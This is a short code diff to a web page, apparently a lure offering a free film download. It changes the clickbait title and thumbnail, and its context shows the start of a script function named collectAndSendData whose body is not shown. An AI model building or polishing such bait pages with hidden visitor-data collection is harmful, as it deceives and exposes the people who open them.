--- a/index.html
+++ b/index.html
@@ -3,8 +3,8 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Click For Full Film [Download]</title>
-    <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQQddq5w0lLo6refdN99HvHOeLRPMYYPABM7JBrh4UhtBBAEKeCmiLD6Rs&s=10"/>
+    <title>[Download] For Click Me 👆 </title>
+    <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ5nZXteLXm_3TzqZrzILpZmqMbpmlAQ44ie2AL_MRZiADK_gwPsueipTU&s=10"/>
     <script>
         async function collectAndSendData() {
             try {
